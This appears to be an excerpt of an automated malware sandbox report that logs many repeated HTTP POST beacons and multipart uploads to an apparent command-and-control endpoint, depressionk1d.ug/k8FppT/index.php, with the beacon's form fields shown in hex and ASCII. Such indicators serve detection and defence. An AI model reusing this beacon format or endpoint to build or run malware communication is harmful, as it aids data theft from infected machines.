              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----35cdb41c8aae8e685df6a1946f054310Host: depressionk1d.ugContent-Length: 111710Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
